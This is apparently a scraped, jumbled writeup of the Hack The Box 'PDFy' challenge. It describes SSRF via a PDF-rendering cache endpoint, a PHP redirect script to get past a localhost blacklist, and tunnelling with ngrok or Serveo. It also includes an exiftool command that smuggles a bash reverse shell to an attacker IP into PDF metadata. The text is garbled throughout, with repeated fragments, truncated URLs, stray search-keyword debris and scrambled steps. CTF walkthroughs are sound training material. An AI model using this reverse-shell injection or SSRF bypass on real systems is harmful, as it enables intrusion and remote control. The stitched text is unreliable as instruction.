The client-side script submits the URL to /api/cache , resulting in a JSON response with a filename in /static/pdfs/ , as detailed on ja-errorpro.codes . Phase 2: Identifying the Backend Vector
To execute this attack, our local server needs to be accessible from the internet. ngrok is the perfect tool for this.
: If you attempt to pass http://127.0.0.1 or http://localhost , the application throws an error or triggers a generic validation block. This implies there is a basic blacklist or sanitization filter preventing the engine from calling internal network services directly. pdfy htb writeup upd
Create a simple PHP script named redirect.php on your attack machine. This script will force any visiting client to redirect to a local file or service on the target machine: Use code with caution.
Pdf (Often associated with PDFy in writeup searches) Difficulty: Easy to Medium OS: Linux Key Skills: File Upload Exploitation, Server-Side Request Forgery (SSRF), Command Injection. Tags: Web, PDF, Exiftool, Python. The client-side script submits the URL to /api/cache
exiftool -Title='test; bash -c "bash -i >& /dev/tcp/10.10.14.xx/4444 0>&1";' shell.pdf
Now, go back to the PDFy web interface and enter your IP: http:// :8000/exploit.php : If you attempt to pass http://127
The first step in any penetration test is to perform an initial scan of the target machine to identify open ports and services. Using Nmap, I ran a basic scan:
If you are running this locally, you must expose your server to the internet so the HTB challenge instance can reach it. Using a Reverse Proxy or tools like Serveo is recommended over ngrok for this specific challenge to avoid browser warning screens that might break the automated PDF rendering.